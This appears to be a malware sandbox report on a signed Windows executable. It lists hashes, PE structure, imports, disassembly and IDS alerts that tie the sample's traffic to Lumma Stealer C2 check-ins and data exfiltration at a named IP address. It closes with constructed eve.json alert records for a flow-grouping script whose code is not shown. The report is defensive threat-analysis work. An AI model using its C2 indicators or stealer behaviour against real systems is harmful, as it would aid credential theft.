MD5: 3C3E3FB6161702F077D39BAE54AB780B
SHA1: 071F755A156ABC6FE4E6F9CD82D19A6CB3A72121
SHA-256: 5CB42D98FC867F8DA8E4F428707068E8D9D85227A6E01E4A172DC76BEA03EC1B
SHA-512: 23941EBDCCFF8EB59424D97E669BFAF6FF2C1EC575E70E5F42C9B4230DB441872B2C68B2B9C4797C6D2467536DDB0E5B3A4B2B1518B4F0767B83A0E7013CBF7A
Malicious: true
Reputation: low
Preview: <!DOCTYPE html>..<html>...<head>. <meta charset="utf-8">. .<title>Error</title>.. . <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free.">. <meta name="keywords" content="paste, markdown, publishing, markdown paste, markdown from command line">.. <meta name="twitter:card" content="summary" />. <meta name="twitter:description" content="Markdown paste service with preview, custom urls and editing." />. <meta name="twitter:title" content="Rentry.co - Markdown Paste" />. <meta name="twitter:site" content="@rentry_co" />. <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" />.. <meta property="og:url" content="https://rentry.co/" />. <meta property="og:title" content="Rentry.co - Markdown Paste Service" />. <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." />. <meta property="og:image" content="https://rentr

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 4.291433707311005
TrID:
• Win32 Executable (generic) a (10002005/4) 99.94%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
File size: 79'325'044 bytes
MD5: f86c1fb3a2c034c4d3d44a96fd9d6093
SHA1: eb478a69bc15b156a9ea0f0276e72788426b5b9e
SHA256: 10216641566ad9478b8aa7af136ee17959c8a4597b663ae379647f437f91f220
SHA512: 8635eebd4dc351856804f7d310d7ba6b7802def8f1ef63590dd62d8f547947c76abc4f7b0364f3f43a0b5b735cbb9aa9a50106f34f3715256a7eefa69a663ab3
SSDEEP: 24576:XrIWzIGJHrHPcf6ZzI5SuxumqUQk0+xBFQbtLlDy/pyy/pNNx4/rdnfRSnJ89d/b:XN7JbTIAtRe/P//2rdfLd/k12jzL
TLSH: 02088479AB1013E55F8399CE4E07E7D6EE6DD1107212246CA28F068BDA438EC4377D6E
File Content Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                  Icon Hash:5fc1c131094d9e07
                                                                                                                                                                  Entrypoint:0x463c48
                                                                                                                                                                  Entrypoint Section:CODE
                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                  DLL Characteristics:
                                                                                                                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                  OS Version Major:1
                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                  File Version Major:1
                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                  Subsystem Version Major:1
                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                  Import Hash:92db50972771bbc9741d8dba3b89adb3
                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                  Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                  • 03/05/2023 01:00:00 03/05/2026 00:59:59
                                                                                                                                                                  Subject Chain
                                                                                                                                                                  • CN=Emjysoft, O=Emjysoft, S=Auvergne-Rh\xf4ne-Alpes, C=FR
                                                                                                                                                                  Version:3
                                                                                                                                                                  Thumbprint MD5:3A209510BAACD4B48C20A0F8656AA26A
                                                                                                                                                                  Thumbprint SHA-1:47D58D082C452B3086973BEE37FB549F965F9E0B
                                                                                                                                                                  Thumbprint SHA-256:6F9838A2DA08559B3E0FE2156E99EA0AA4F3D1CD43675980B806CDECA7A5E616
                                                                                                                                                                  Serial:00989AAB57D7FCC43812B213AEDEA41AB6
Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF4h
push ebx
mov eax, 00463A68h
call 00007F76ACCD3000h
mov ebx, dword ptr [00464D18h]
mov eax, dword ptr [ebx]
call 00007F76ACCF8737h
mov eax, dword ptr [ebx]
mov edx, 00463D08h
call 00007F76ACCF8443h
mov eax, dword ptr [ebx]
add eax, 34h
mov edx, 00463D38h
call 00007F76ACCD154Ch
mov ecx, dword ptr [00464BCCh]
mov eax, dword ptr [ebx]
mov edx, dword ptr [00463614h]
call 00007F76ACCF8721h
mov ecx, dword ptr [00464D54h]
mov eax, dword ptr [ebx]
mov edx, dword ptr [0046205Ch]
call 00007F76ACCF870Eh
mov ecx, dword ptr [00464D7Ch]
mov eax, dword ptr [ebx]
mov edx, dword ptr [00462C68h]
call 00007F76ACCF86FBh
mov ecx, dword ptr [00464D68h]
mov eax, dword ptr [ebx]
mov edx, dword ptr [004602F4h]
call 00007F76ACCF86E8h
mov ecx, dword ptr [00464DF4h]
mov eax, dword ptr [ebx]
mov edx, dword ptr [0044EA78h]
call 00007F76ACCF86D5h
mov ecx, dword ptr [00464DCCh]
mov eax, dword ptr [ebx]
mov edx, dword ptr [0045F9B0h]
call 00007F76ACCF86C2h
mov eax, dword ptr [ebx]
call 00007F76ACCF8747h
pop ebx
call 00007F76ACCD1349h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x66000 | 0x1e1c | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x71000 | 0x136e00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x4ba3a04 | 0x2d70 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6a000 | 0x66e0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x69000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x62d44 | 0x62e00 | a608b75b620bc9899da54425632a33e5 | False | 0.5154768489254109 | data | 6.498737751055233 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x64000 | 0xe2c | 0x1000 | b9ffc5470506451801f9a3ee8bb378eb | False | 0.396240234375 | data | 3.9376047457579335 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x65000 | 0xa65 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x66000 | 0x1e1c | 0x2000 | 1e4c463a52feae64e21dcc93c56c27fe | False | 0.358642578125 | data | 4.711728774841513 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x68000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x69000 | 0x18 | 0x200 | 6eda95e7f89fac29502da04b93c31e66 | False | 0.05078125 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x6a000 | 0x66e0 | 0x6800 | 2a6e3bd94e29f2f2a46d5c3d5d03f649 | False | 0.6045297475961539 | data | 6.636864870170326 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x71000 | 0x136e00 | 0x136e00 | ab6dad1a6881f59023e131ce70af5cd4 | False | 0.42046611127864897 | data | 7.584171439487795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x71b58 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | French | France | 0.5714285714285714
RT_CURSOR | 0x71c8c | 0x134 | data | | | 0.4642857142857143
RT_CURSOR | 0x71dc0 | 0x134 | data | | | 0.4805194805194805
RT_CURSOR | 0x71ef4 | 0x134 | data | | | 0.38311688311688313
RT_CURSOR | 0x72028 | 0x134 | data | | | 0.36038961038961037
RT_CURSOR | 0x7215c | 0x134 | data | | | 0.4090909090909091
RT_CURSOR | 0x72290 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468
RT_CURSOR | 0x723c4 | 0x134 | data | | | 0.38636363636363635
RT_CURSOR | 0x724f8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635
RT_ICON | 0x7262c | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | French | France | 0.6252665245202559
RT_ICON | 0x734d4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | French | France | 0.769404332129964
RT_ICON | 0x73d7c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | French | France | 0.611271676300578
RT_ICON | 0x742e4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | French | France | 0.3741701244813278
RT_ICON | 0x7688c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | French | France | 0.599671669793621
RT_ICON | 0x77934 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | French | France | 0.725177304964539
RT_STRING | 0x77d9c | 0xec | data | | | 0.5466101694915254
RT_STRING | 0x77e88 | 0x130 | data | | | 0.5493421052631579
RT_STRING | 0x77fb8 | 0x224 | data | | | 0.4306569343065693
RT_STRING | 0x781dc | 0x5cc | data | | | 0.32681940700808626
RT_STRING | 0x787a8 | 0x254 | data | | | 0.5016778523489933
RT_STRING | 0x789fc | 0x128 | data | | | 0.5304054054054054
RT_STRING | 0x78b24 | 0x2d8 | data | | | 0.4532967032967033
RT_STRING | 0x78dfc | 0x4a8 | data | | | 0.3859060402684564
RT_STRING | 0x792a4 | 0x43c | data | | | 0.34501845018450183
RT_STRING | 0x796e0 | 0x314 | data | | | 0.37817258883248733
RT_STRING | 0x799f4 | 0xe4 | data | | | 0.5570175438596491
RT_STRING | 0x79ad8 | 0xb8 | data | | | 0.5543478260869565
RT_STRING | 0x79b90 | 0x384 | data | | | 0.4266666666666667
RT_STRING | 0x79f14 | 0x434 | data | | | 0.370817843866171
RT_STRING | 0x7a348 | 0x368 | data | | | 0.39908256880733944
RT_RCDATA | 0x7a6b0 | 0x10 | data | | | 1.5
RT_RCDATA | 0x7a6c0 | 0x2b0 | data | | | 0.7311046511627907
RT_RCDATA | 0x7a970 | 0x2722 | Delphi compiled form 'TEnvoyerResultatDlg' | | | 0.3609502894789379
RT_RCDATA | 0x7d094 | 0x644e6 | Delphi compiled form 'TEtoileDlg' | | | 0.4514499067795373
RT_RCDATA | 0xe157c | 0x2cb13 | Delphi compiled form 'TPerfCDInfoDlg' | | | 0.19966786664408742
RT_RCDATA | 0x10e090 | 0x12412 | Delphi compiled form 'TPerfCDROMChartDlg' | | | 0.10465427310418617
RT_RCDATA | 0x1204a4 | 0x2d672 | Delphi compiled form 'TPerfCDROMDlg' | | | 0.1919825778351347
RT_RCDATA | 0x14db18 | 0x77f | Delphi compiled form 'TSelectionCDROMDlg' | | | 0.39030745179781134
RT_GROUP_CURSOR | 0x14e298 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | French | France | 1.25
RT_GROUP_CURSOR | 0x14e2ac | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x14e2c0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x14e2d4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x14e2e8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x14e2fc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x14e310 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x14e324 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x14e338 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_ICON | 0x14e34c | 0x5a | data | French | France | 0.7333333333333333
RT_VERSION | 0x14e3a8 | 0x360 | data | French | France | 0.4652777777777778
                                                                                                                                                                  RT_MANIFEST0x14e7080x2bdXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4893009985734665
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpyA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, CreateFileA, CloseHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, GetModuleFileNameA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCreateKeyExA, RegCloseKey
kernel32.dll | WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ReadFile, OutputDebugStringA, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
gdi32.dll | UnrealizeObject, TextOutA, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetTextAlign, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetBrushOrgEx, GetBkColor, GetBitmapBits, ExcludeClipRect, EnumFontsA, EnumFontFamiliesExA, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt, Arc
user32.dll | WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowOwnedPopups, ShowCursor, SetWindowRgn, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadIconA, LoadCursorA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRgn, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollPos, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIcon, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharLowerBuffA, CharLowerA, CharUpperBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
comctl32.dll | ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll | ShellExecuteA
Language of compilation system | Country where language is spoken | Map
French | France |
English | United States |


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-28T16:15:57.972873+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 104.21.60.241 | 443 | TCP
2025-01-28T16:15:58.771885+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49734 | 104.21.60.241 | 443 | TCP
2025-01-28T16:15:58.771885+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49734 | 104.21.60.241 | 443 | TCP
2025-01-28T16:15:59.294730+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49736 | 104.21.60.241 | 443 | TCP
2025-01-28T16:15:59.782405+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49736 | 104.21.60.241 | 443 | TCP
2025-01-28T16:15:59.782405+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49736 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:01.039050+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49738 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:13.829900+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:26.672332+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:40.165943+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49752 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:40.931548+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49752 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:43.058158+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49773 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:43.064017+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.4 | 49773 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:57.101132+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49859 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:57.561213+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49859 | 104.21.60.241 | 443 | TCP
2025-01-28T16:16:58.057907+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49865 | 104.26.3.16 | 443 | TCP
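Several of the flows above carry both the generic JA3 signature (severity 3) and a Lumma-specific C2 or exfiltration signature (severity 1) on the same client port, while others carry the JA3 hit alone. The Python below is an added example, not part of this Joe Sandbox report: it reads the alerts in Suricata's eve.json alert layout (the records are constructed from the table rows, not a captured eve.json), groups them per 5-tuple, and reports which flows escalated from the weak JA3 indicator to a high-confidence signature and which destination IPs carried severity-1 hits. Field names follow the standard EVE alert schema; the escalation rule is the author's own heuristic.

```python
"""Group Suricata EVE alerts per TCP flow and flag flows that escalated
from a weak JA3 indicator to a Lumma-specific severity-1 signature."""
import json
from collections import defaultdict
from datetime import datetime

# Constructed input: the alert rows of this report rewritten as eve.json
# "alert" records. Not a captured log.
EVE_LINES = r"""
{"timestamp":"2025-01-28T16:15:57.972873+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49734,"dest_ip":"104.21.60.241","dest_port":443,"proto":"TCP","alert":{"signature_id":2028371,"signature":"ET JA3 Hash - Possible Malware - Fake Firefox Font Update","severity":3}}
{"timestamp":"2025-01-28T16:15:58.771885+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49734,"dest_ip":"104.21.60.241","dest_port":443,"proto":"TCP","alert":{"signature_id":2049836,"signature":"ET MALWARE Lumma Stealer Related Activity","severity":1}}
{"timestamp":"2025-01-28T16:15:58.771885+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49734,"dest_ip":"104.21.60.241","dest_port":443,"proto":"TCP","alert":{"signature_id":2054653,"signature":"ET MALWARE Lumma Stealer CnC Host Checkin","severity":1}}
{"timestamp":"2025-01-28T16:15:59.294730+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49736,"dest_ip":"104.21.60.241","dest_port":443,"proto":"TCP","alert":{"signature_id":2028371,"signature":"ET JA3 Hash - Possible Malware - Fake Firefox Font Update","severity":3}}
{"timestamp":"2025-01-28T16:15:59.782405+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49736,"dest_ip":"104.21.60.241","dest_port":443,"proto":"TCP","alert":{"signature_id":2049812,"signature":"ET MALWARE Lumma Stealer Related Activity M2","severity":1}}
{"timestamp":"2025-01-28T16:15:59.782405+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49736,"dest_ip":"104.21.60.241","dest_port":443,"proto":"TCP","alert":{"signature_id":2054653,"signature":"ET MALWARE Lumma Stealer CnC Host Checkin","severity":1}}
{"timestamp":"2025-01-28T16:16:01.039050+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49738,"dest_ip":"104.21.60.241","dest_port":443,"proto":"TCP","alert":{"signature_id":2028371,"signature":"ET JA3 Hash - Possible Malware - Fake Firefox Font Update","severity":3}}
{"timestamp":"2025-01-28T16:16:13.829900+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49743,"dest_ip":"104.21.60.241","dest_port":443,"proto":"TCP","alert":{"signature_id":2028371,"signature":"ET JA3 Hash - Possible Malware - Fake Firefox Font Update","severity":3}}
{"timestamp":"2025-01-28T16:16:26.672332+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49744,"dest_ip":"104.21.60.241","dest_port":443,"proto":"TCP","alert":{"signature_id":2028371,"signature":"ET JA3 Hash - Possible Malware - Fake Firefox Font Update","severity":3}}
{"timestamp":"2025-01-28T16:16:40.165943+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49752,"dest_ip":"104.21.60.241","dest_port":443,"proto":"TCP","alert":{"signature_id":2028371,"signature":"ET JA3 Hash - Possible Malware - Fake Firefox Font Update","severity":3}}
{"timestamp":"2025-01-28T16:16:40.931548+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49752,"dest_ip":"104.21.60.241","dest_port":443,"proto":"TCP","alert":{"signature_id":2048094,"signature":"ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration","severity":1}}
{"timestamp":"2025-01-28T16:16:43.058158+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49773,"dest_ip":"104.21.60.241","dest_port":443,"proto":"TCP","alert":{"signature_id":2028371,"signature":"ET JA3 Hash - Possible Malware - Fake Firefox Font Update","severity":3}}
{"timestamp":"2025-01-28T16:16:43.064017+0100","event_type":"alert","src_ip":"192.168.2.4","src_port":49773,"dest_ip":"104.21.60.241","dest_port":443,"proto":"TCP","alert":{"signature_id":2843864,"signature":"ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2","severity":1}}
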